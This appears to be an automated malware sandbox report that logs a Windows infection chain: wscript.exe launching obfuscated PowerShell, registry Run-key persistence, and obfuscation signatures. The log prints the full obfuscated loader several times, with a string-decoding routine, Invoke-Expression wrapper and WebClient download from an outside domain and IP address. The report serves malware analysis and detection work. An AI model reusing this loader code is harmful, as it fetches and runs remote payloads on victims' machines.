tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,	Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8809AD push E85E535Dh; ret	1_2_00007FFD9B8809F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B955479 push ebp; iretd	1_2_00007FFD9B955538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0454EC78 pushfd ; retf	4_2_0454EC79
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_045436D9 push ebx; iretd	4_2_045436DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_073D1D28 push eax; mov dword ptr [esp], ecx	4_2_073D21B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_073DA555 push esp; retf	4_2_073DA559
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_073D219E push eax; mov dword ptr [esp], ecx	4_2_073D21B4

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key			Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
